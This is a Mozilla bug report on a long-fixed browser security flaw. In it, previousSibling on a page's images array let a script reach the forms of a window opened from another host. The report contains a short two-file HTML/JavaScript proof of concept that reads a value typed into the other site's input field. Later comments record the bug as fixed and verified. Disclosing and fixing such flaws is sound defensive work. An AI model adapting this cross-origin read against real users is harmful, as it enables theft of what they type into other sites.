Closed
Bug 22909
Opened 25 years ago
Closed 25 years ago
previousSibling vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
previousSibling is exposed in the images array. This allows access to parts of the DOM of a document from another host. Especially bad is accessing the forms array by using images[x].previousSibling. The code is: ------------------------read3.html----------------------------------- <HTML> <HEAD><TITLE>Images 2</TITLE> </HEAD> Type something in the INPUT element in the other window, then <SCRIPT> a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html"); function f() { alert("The value is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value); } </SCRIPT> <A HREF="javascript:f()">click here to get it</A> </HTML> --------------------------------------------------------------------- ------------------links2.html (on another web server)--------------- <HTML> <IMG SRC="ball.gif"> <FORM NAME="f" ACTION="#"> <INPUT TYPE="TEXT"> <INPUT TYPE="SUBMIT"> </FORM> <IMG SRC="ball.gif"> </HTML> ---------------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 1•25 years ago
|
||
This should have been checked by the default preferences, but the mechanism got skewed. Hopefully the changes I've committed will make it harder for this to happen in the future. Until this change hits, however, all DOM property access must be considered broken.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Updated•19 years ago
|
Flags: testcase+
Updated•17 years ago
|
Flags: in-testsuite+ → in-testsuite?
You need to log in
before you can comment on or make changes to this bug.
Description
•